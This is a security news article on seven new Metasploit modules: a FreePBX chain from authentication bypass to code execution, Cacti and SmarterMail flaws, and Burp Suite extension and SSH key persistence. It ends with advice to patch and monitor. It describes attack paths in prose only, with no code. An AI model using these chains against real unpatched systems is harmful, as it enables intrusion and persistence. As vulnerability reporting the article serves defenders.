Metasploit Enhances Security Arsenal with Seven New Exploit Modules Targeting FreePBX, Cacti, and SmarterMail
The Metasploit Framework has recently expanded its capabilities by introducing seven new exploit modules, significantly bolstering the toolkit available to penetration testers and red team professionals. This update focuses on vulnerabilities within widely-used enterprise software, including FreePBX, Cacti, and SmarterMail, highlighting the persistent risks associated with authentication bypass flaws and their potential to lead to full system compromises.
FreePBX Vulnerability Chaining
A notable advancement in this release is the development of three distinct modules targeting FreePBX, an open-source graphical user interface that manages Asterisk (PBX) systems. Researchers Noah King and msutovsky-r7 have crafted a method to chain multiple vulnerabilities, escalating privileges from an unauthenticated state to remote code execution (RCE).
The attack sequence initiates with CVE-2025-66039, an authentication bypass vulnerability that allows unauthorized users to circumvent standard login protocols. Once this barrier is breached, attackers have two primary avenues to achieve RCE:
1. SQL Injection Exploit (CVE-2025-61675): By injecting malicious SQL commands, attackers can manipulate the database to insert new jobs into the `cron_job` table, effectively scheduling the execution of arbitrary code.
2. Unrestricted File Upload (CVE-2025-61678): This flaw in the firmware upload function permits attackers to upload a webshell directly to the server, granting immediate control over the system.
Additionally, an auxiliary module leverages the same SQL injection vulnerability to create rogue administrator accounts, demonstrating the versatility and potential impact of this exploit chain.
Critical RCE in Cacti and SmarterMail
Beyond the VoIP sector, the update addresses severe vulnerabilities in monitoring and communication platforms:
– Cacti (CVE-2025-24367): This vulnerability affects versions prior to 1.2.29 and allows unauthenticated remote code execution via the graph template mechanism. Given Cacti’s widespread use in infrastructure monitoring, this module is a high-priority concern for network administrators.
– SmarterMail (CVE-2025-52691): An unauthenticated file upload vulnerability exploits path traversal manipulation within the `guid` variable. The module adapts to the target’s operating system:
– Windows: Deploys a webshell in the webroot directory.
– Linux: Achieves persistence and execution by creating a cron job in `/etc/cron.d`.
Enhancements in Persistence Tools and Core Fixes
The release also introduces improvements in post-exploitation capabilities:
– Burp Suite Extension Persistence Module: Allows attackers to install a malicious extension on both Pro and Community versions, executing whenever the user launches the application.
– Unified SSH Key Persistence Module: Consolidates Windows and Linux SSH key persistence into a single module, streamlining operations.
Additionally, critical bugs have been addressed:
– Hash Data Formatting Issue: Resolved to ensure compatibility with the John the Ripper password cracker.
– SSH Login Scanner Logic Error: Fixed to accurately report successful logins, even when sessions could not be opened.
Module Overview
The following table summarizes the new modules introduced:
| Module Name | CVE ID(s) | Target System | Impact |
|—————————–|————————-|—————|————————-|
| FreePBX Endpoint SQLi | CVE-2025-66039, CVE-2025-61675 | FreePBX | Remote Code Execution |
| FreePBX Firmware Upload | CVE-2025-66039, CVE-2025-61678 | FreePBX | Remote Code Execution |
| Cacti Graph Template RCE | CVE-2025-24367 | Cacti | Remote Code Execution |
| SmarterMail File Upload | CVE-2025-52691 | SmarterMail | Remote Code Execution |
Implications and Recommendations
The introduction of these modules underscores the critical need for organizations to proactively manage and secure their systems. Administrators are urged to:
– Apply Patches Promptly: Ensure all systems are updated to the latest versions to mitigate known vulnerabilities.
– Conduct Regular Security Assessments: Utilize tools like Metasploit to identify and address potential security gaps.
– Monitor System Logs: Keep an eye on logs for any unusual activities that may indicate exploitation attempts.
By staying vigilant and implementing these practices, organizations can significantly reduce the risk of exploitation and enhance their overall security posture.
